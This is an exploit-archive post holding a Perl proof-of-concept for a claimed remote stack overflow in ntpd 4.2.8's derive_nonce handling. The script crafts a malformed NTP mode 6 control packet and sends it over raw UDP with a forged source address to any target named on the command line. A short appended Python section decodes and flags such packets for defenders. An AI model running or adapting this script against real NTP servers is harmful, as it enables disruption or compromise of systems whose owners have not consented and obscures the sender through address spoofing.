
Linux ntpd 4.2.8 derive_nonce Stack Overflow

Posted Nov 25, 2016
Authored by Todor Donev

Linux ntpd 4.2.8 derive_nonce remote stack overflow proof of concept exploit.

tags | exploit, remote, overflow, proof of concept
systems | linux
SHA-256 | b644936d55c89c9d1095c1dad6cbce1fa3aca1cbfa564eea9887ba3b31074317

#!/usr/bin/perl
#
# Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC
#
# Copyright 2016 (c) Todor Donev
# todor.donev@gmail.com
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# The ntpd program is an operating-system daemon that sets and maintains
# a computer system's system time in synchronization with Internet-standard
# time servers. It is a complete implementation of the Network Time Protocol
# (NTP) version 4, but retains compatibility with versions 1, 2, and 3.
# ntpd uses a single configuration-file to run the daemon in server and/or
# client modes. The configuration file, usually named ntp.conf, is located
# in the /etc directory. Other important files include the drift file, which
# ntpd uses to correct for hardware-clock skew in the absence of a connection
# to a more accurate upstream time-server.
#
# A nonce is an arbitrary number that may be used only once in a cryptographic
# communication. It is similar in spirit to a nonce word, hence the name. It is
# often a random or pseudo-random number issued in an authentication protocol to
# ensure that old communications cannot be reused in replay attacks. Nonces can
# also be useful as initialization vectors and in cryptographic hash functions.
# Many nonces also include a
# timestamp to ensure exact timeliness, though this requires clock synchronization
# between organizations. The addition of a client nonce ("cnonce") helps to improve
# the security in some ways as implemented in digest access authentication. To ensure
# that a nonce is used only once, it should be time-variant (including a suitably
# fine-grained timestamp in its value), or generated with enough random bits to ensure
# a probabilistically insignificant chance of repeating a previously generated value.
# Some authors define pseudo-randomness (or unpredictability) as a requirement for a
# nonce.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational purpose ONLY!
#
# Thanks to Maya Hristova and all my friends that support me.
#
# Suggestions,comments and job offers are welcome!
#
#

use Net::RawIP;

print "[ Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC\n";
print "[ ======\n";
print "[ Usg: $0 <target>\n";
print "[ Example: perl $0 133.71.33.7\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";
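my $target = $ARGV[0] or die "[ No target given\n";
# NTP mode 6 (control) request: 12-byte header followed by the data field.
# 0x26 = LI 0, version 4, mode 6; 0x0a = opcode 10; count field = 0x0005.
# The data is the ASCII variable name "nonce" followed by 'A' (0x41) filler.
my $data = "\x26\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x6e\x6f\x6e\x63\x65\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
my $sock = Net::RawIP->new({ udp => {} }) or die;
$sock->set({ ip  => { saddr => "192.168.1.1", daddr => $target },
             udp => { source => 31337, dest => 123, data => $data } });
$sock->send;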
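
For defenders, the request this script builds can be recognised on the wire. The following is an added example, not part of the original post: a Python decoder for the NTP mode 6 control header that flags requests shaped like the one above. The header layout is the standard control-message format and opcode 10 is READ_MRU in ntpd; the function names and both sample packets are constructed for illustration.

```python
import struct

CTL_MODE = 6       # NTP mode 6: control message
OP_READ_MRU = 10   # opcode byte 0x0a in the script's request

def parse_ctl(payload: bytes):
    """Decode the 12-byte control header; None if too short or not mode 6."""
    if len(payload) < 12:
        return None
    b0, b1, _, _, _, _, count = struct.unpack("!BBHHHHH", payload[:12])
    if b0 & 0x07 != CTL_MODE:
        return None
    body = payload[12:]
    return {
        "response": bool(b1 & 0x80),
        "opcode": b1 & 0x1F,
        "count": count,
        "data": body[:count],                      # bytes the header declares
        "trailing": max(len(body) - count, 0),     # bytes after declared data
    }

def findings(payload: bytes):
    """Reasons a request deserves an analyst's attention (empty list = none)."""
    m = parse_ctl(payload)
    if m is None or m["response"]:
        return []
    out = []
    if m["opcode"] == OP_READ_MRU:
        out.append("READ_MRU request")
        for item in m["data"].split(b","):
            name, _, value = item.strip().partition(b"=")
            if name == b"nonce" and not value:
                out.append("nonce variable without a value")
    if m["count"] > len(payload) - 12:
        out.append("count exceeds data present")
    pad = -m["count"] % 4                          # normal 32-bit padding
    if m["trailing"] > pad:
        out.append(f"{m['trailing']} bytes after declared count")
    return out

def header(opcode: int, count: int) -> bytes:
    return struct.pack("!BBHHHHH", 0x26, opcode, 0, 0, 0, 0, count)

# Constructed samples: one shaped like the script's request, one plain READVAR.
SAMPLE_POC_SHAPED = header(10, 5) + b"nonce" + b"A" * 15
SAMPLE_READVAR = header(2, 0)
if __name__ == "__main__":
    for label, pkt in (("poc-shaped", SAMPLE_POC_SHAPED), ("readvar", SAMPLE_READVAR)):
        print(label, findings(pkt))
```

Authenticated control requests carry a MAC after the padded data, so the trailing-bytes finding is a hint to look closer rather than a verdict on its own.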